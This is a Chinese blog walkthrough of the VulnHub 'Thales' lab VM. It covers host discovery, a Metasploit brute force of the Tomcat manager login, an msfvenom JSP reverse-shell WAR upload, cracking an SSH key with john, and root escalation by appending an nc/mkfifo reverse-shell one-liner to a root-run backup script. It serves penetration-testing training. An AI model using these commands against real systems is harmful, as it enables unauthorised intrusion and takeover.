vulnhub靶场之Thales

最新推荐文章于 2024-04-29 09:19:58 发布
最新推荐文章于 2024-04-29 09:19:58 发布
阅读量984 收藏 23
点赞数 21
分类专栏: [ vulnhub靶机通关篇 ] 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58091216/article/details/136033851
版权

一.环境搭建

1.靶场描述

Description : Open your eyes and change your perspective
includes 2 flags:user.txt and root.txt.
Telegram: @machineboy141 (for any hint)
This works better with VIrtualBox rathe than VMware

2.靶场地址

https://www.vulnhub.com/entry/thales-1,749/
 

 

image-20240129163223146
 

3.启动靶场
 

Thales靶机在VMware运行会出现bug,所以我们在VirtualBox运行。
 

 

image-20240129163328402
 

虚拟机开启之后界面如上,我们不知道ip,需要自己探活,因为我们在VirtualBox运行所以网段发生了变化,网段知道:192.168.1.0/24
 

二.渗透测试
 

1.目标
 

目标就是我们搭建的靶场,靶场IP为:192.168.1.0/24
 

2.信息收集
 

(1)寻找靶场真实ip
 

nmap -sP 192.168.1.0/24
 

 

 

image-20240129163940132
 

arp-scan -l
 

 

 

image-20240129164229619
 

靶场真实ip地址为192.168.1.13
 

(2)探测端口及服务
 

nmap -p- -sV 192.168.1.13
 

 

 

image-20240129164045121
 

发现开启了22端口,OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
发现开启了8080端口,Apache Tomcat 9.0.52
 

 

(3)web指纹识别
 

whatweb -v 192.168.1.13:8080
 

 

 

image-20240129164342897
 

3.渗透测试
 

(1)访问web服务
 

http://192.168.1.13:8080
 

 

 

image-20240129164445794
 

我们可以看到是Tomcat
 

(2)扫描web服务
 

1)棱洞3.0指纹识别
 

./EHole_linux_amd64 finger -u http://192.168.1.13:8080
 

 

 

image-20240129164921542
 

2)nikto扫描网站结构
 

nikto -h http://192.168.1.13:8080
 

 

3)dirsearch目录扫描
 

dirsearch -u 192.168.1.13:8080 -e * -x 403 --random-agent
 

 

我们扫描到一个登录页面
 

http://192.168.1.13:8080/manager
 

 

 

image-20240129165606671
 

目前,我们掌握的信息是一个tomcat框架和一个登录页面,因为tomcat 有管理登录页面,于是尝试爆破
 

(3)渗透测试
 

1)msf爆破
 

search login tomcat
 

 

 

image-20240129170544353
 

show options
 

 

set RHOSTS 192.168.1.13
 

 

 

image-20240129170723929
 

爆破出来一个用户名和密码
 

 

image-20240129170810334
 

tomcat:role1
 

2)登录
 

我们可以看到登录成功
 

 

image-20240129170852364
 

3)反弹shell
 

我们可以看到/shell和上传页面,那么我们进行shell,在 web 应用程序部署界面尝试在上传 war 包反弹 shell
 

 

image-20240129171145361
 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.9 LPORT=666666 -f war -o MS02423.war
 

 

 

image-20240129172804028
 

我们进行上传
 

 

image-20240129172724391
 

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹
 

 

image-20240129172826998
 

我们可以看到反弹成功
 

我们进行提权,发现需要密码,我们进行查找
 

 

image-20240129173210637
 

4)执行脚本
 

一般情况下,我们首先去home目录下查看,然后在去/var/www/html/目录下查看有没有什么线索,我们看到了thales命令,我们进行查看
 

 

image-20240130161433886
 

我们看到了两个txt文件,模式里面提示我们,一个flag在user.txt,一个在root.txt里面,那么我们进行查看user.txt文件,但是需要thales权限,我们查看notes.txt文件,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh
 

includes 2 flags:user.txt and root.txt.
 

 

 

image-20240130161558059
 

 

image-20240130161920839
 

我们去执行这个脚本,但是执行之后却发现没有如何变化
 

 

5)ssh 私钥文件
 

我们在thales目录下发现了隐藏的.ssh文件,我们进行查看
 

 

image-20240130162530044
 

这样看太难受了,我们进行交互模式进行查看
 

 

image-20240130162852020
 

我们可以看到公钥,我们进行查看
 

 

我们把它保存下来,用john进行爆破
 

6)john爆破
 

将私钥文件保存到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06
 

 

image-20240130170943990
 

 

image-20240130171014530
 

 

image-20240130171045172
 

7)查看user.txt文件
 

我们进行登录thales用户名
 

 

image-20240130171432515
 

我们获取到第一个flag,还有一个flag在root.txt里面,我们进行提权
 

8)提权
 

之前我们看到的那个脚本还没有查看内容,现在我们查看一下那个备份文件的代码
 

 

image-20240130171752726
 

是一个shell文件,并且是能运行命令的,我们是可以编辑的,并且是root用户运行的,我们插入一串反弹shell的命令
 

 

image-20240130171844539
 

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.9 5555 >/tmp/f" >> backup.sh
 

 

 

image-20240130172619811
 

等一会可以看到反弹成功,我们查看flag即可
 

 

image-20240130172935974
 

三.相关资源
 

1.靶场下载地址
 

2.nmap
 

3.arp-scan
 

4.masscan
 

5.[ 常用工具篇 ] 渗透神器 whatweb 安装使用详解
 

6.[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解(linux & win)
 

7.nikto工具的使用
 

8.dirsearch目录扫描
 

9.msf工具使用
 

10.ssh私钥文件
 

11.john爆破密码
 

12.反弹shell

                

        

        

    




    

      

        

            

              
                
                  MS02423
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    21
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    23
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
thales

				
			

			

				

					03-26
				

			

		

		

			
				
Thales,这个名字源于古希腊哲学家泰勒斯(Thales of Miletus),在现代则被用作一家全球领先的科技公司——泰雷兹(Thales Group)的名称。Thales集团是一家法国跨国企业,专注于为航空、国防、安全和太空等行业...

			
		

	



                

              
                



	

		

			

				
					
THALES

				
			

			

				

					10-24
				

			

		

		

			
				
"THALES"是一个可能与字体相关的主题,但提供的信息相当有限。在IT行业中,字体通常涉及到文本显示、排版设计、编程以及用户界面等多个领域。THALES这个名字本身并不直接指向一个特定的字体或技术,因此我们需要进行...

			
		

	



                


  
              

                


	

		

			

				
					
vulnhub靶机-THALES: 1

				
			

			

				

					臭nana的博客
				

				

					03-18
					
					4589
					
				

			

		

		

			
				
1、找到靶机ip:192.168.1.106


nmap -sn 192.168.1.0/24



2、扫描靶机端口,开放22和8080端口

 3、先搜索对应中间件有没有公开漏洞,没有发现,于是先从8080端口入手,访问之后是一个tomcat服务默认页面,先扫描一下目录



可疑的就只有shell目录,但是访问就一直转圈,跟平常反弹shell的页面一样,所以猜测应该是作者测试时上传的,结合tomcat和shell目录,可以猜想应该是tomcat后台布置war包getshell,但是管理后台需要...

			
		

	





	

		

			

				
					
Vulnhub——THALES: 1靶场

				
			

			

				

					Re1_zf的博客
				

				

					11-15
					
					811
					
				

			

		

		

			
				
1、msfvenom生成反弹shell的war文件2、python脚本转换公钥文件为JTR攻击兼容文件python3 ssh2john.py 需要处理的文件 > 输出的文件3、john爆破ssh公钥(基于JTR攻击兼容文件)john --wordlist=/usr/share/wordlists/rockyou.txt 爆破文件4、利用mkfifo命令实现权限维持mkfifo创建的是一个管道文件,这里这种情况下这个文件中的内容会实时更新,即输入的命令会被实时读取。

			
		

	



		

			
		



	

		

			

				
					
VulnHub靶场-Lampiao

					
最新发布

				
			

			

				

					weixin_48972359的博客
				

				

					04-29
					
					631
					
				

			

		

		

			
				
靶机:Lampiao靶机中只有一个存放在root家目录中的flag。

			
		

	





	

		

			

				
					
Vulnhub-thales靶机

				
			

			

				

					lionwerson的博客
				

				

					12-03
					
					749
					
				

			

		

		

			
				
thales下载地址https://download.vulnhub.com/thales/Thales.zip1.导入virtual box,网络改为桥接模式,打开虚拟机。

2.nmap扫描一下端口:



开放了8080端口和22端口。

3.浏览器打开8080端口:



服务是tomcat,版本是9.0.52,没有任意文件读取和写入的漏洞,只能爆破manager app认证

4.burp认证爆破,tomcat的账号和密码格式是【用户名:密码】然后经过base64加密进行发送:







..

			
		

	





	

		

			

				
					
Vulnhub靶场THALES: 1

				
			

			

				

					DG_s1mple
				

				

					03-17
					
					3033
					
				

			

		

		

			
				
环境准备
下载靶机导入到vmware

信息收集
我们使用arp-scan命令查找靶机的IP地址

靶机IP地址为:192.168.2.18
攻击机IP地址为:192.168.2.17
我们使用nmap扫描靶机开启的服务

发现靶机开放了tomcat和ssh,我们先访问他的tomcat


渗透开始
tomcat发现可以登录,我们尝试爆破一下


成功爆破出账号密码,我们返回网站登录
发现manager app页面可以上传文件

我们使用如下命令创建一个反弹shell的木马上传
msfvenom -p ja

			
		

	





	

		

			

				
					
vulhub thales:1 靶场

				
			

			

				

					GRXHunter的博客
				

				

					04-12
					
					3445
					
				

			

		

		

			
				
vulhub thales:1靶场

			
		

	





	

		

			

				
					
Thales(泰勒兹)基于模型的系统工程方法论

				
			

			

				

					08-15
				

			

		

		

			
				
法国泰勒兹集团(Thales)基于模型的系统工程方法论资料

			
		

	





	

		

			

				
					
HSM-Basics.pdf.tar.gz_HSM_HSM thales

				
			

			

				

					07-14
				

			

		

		

			
				
Thales HSM Basics. How to interface with HSM device

			
		

	





	

		

			

				
					
Thales Corporate_Brochure

				
			

			

				

					11-24
				

			

		

		

			
				
international innovation partnerships responsibility aerospace space defence security

			
		

	





	

		

			

				
					
Thales 靶场渗透记录

				
			

			

				

					找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
				

				

					10-15
					
					918
					
				

			

		

		

			
				
Thales靶场渗透记录
提权好难~~

			
		

	





	

		

			

				
					
VulnHub渗透测试实战靶场笔记(持续更新)

				
			

			

				

					晚风不及你
				

				

					03-05
					
					7474
					
				

			

		

		

			
				
Breach1.0
下载链接
https://download.vulnhub.com/breach/Breach-1.0.zip
靶机说明
Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。
VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...

			
		

	





	

		

			

				
					
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)

				
			

			

				

					qq_51577576的博客
				

				

					03-14
					
					8030
					
				

			

		

		

			
				
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
从信息收集到拿到低权限,最后提权获取最高权限,详细解读

			
		

	





	

		

			

				
					
Vulnhub | 实战靶场渗透测试 - PRIME: 1

				
			

			

				

					尼泊罗河伯的博客
				

				

					06-01
					
					1666
					
				

			

		

		

			
				
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。

			
		

	





	

		

			

				
					
vulnhub靶场-Nagini

				
			

			

				

					qq_42947816的博客
				

				

					11-01
					
					1891
					
				

			

		

		

			
				
Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort

			
		

	





	

		

			

				
					
Vulnhub-DC-1实战靶场

				
			

			

				

					ierciyuan的博客
				

				

					10-12
					
					2500
					
				

			

		

		

			
				
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。

			
		

	





	

		

			

				
					
看完这篇 教你玩转渗透测试靶机vulnhub——DC7

				
			

			

				

					Aluxian_的博客
				

				

					04-01
					
					6004
					
				

			

		

		

			
				
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。
Vulnhub靶机下载:
官网地址:https://download.vulnhub.com/dc/D

			
		

	





	

		

			

				
					
Vulhub漏洞靶场搭建

				
			

			

				

					Innocence_0的博客
				

				

					09-20
					
					958
					
				

			

		

		

			
				
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。物理机:Windows 10虚拟机:Centos 7,网卡设置为NAT模式从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

			
		

	





	

		

			

				
					
Thales Cadence介绍与实施原则

				
			

			

				

					
				

			

		

		

			
				
Cadence在这里可能是Capella的一个扩展或增强工具,或者是一种与之配合使用的软件。"Cadence"一词在不同上下文中可能有不同含义,通常在电子设计自动化(EDA)领域指的是一种综合设计工具,但在MBSE的背景下,它可能...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
MS02423

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值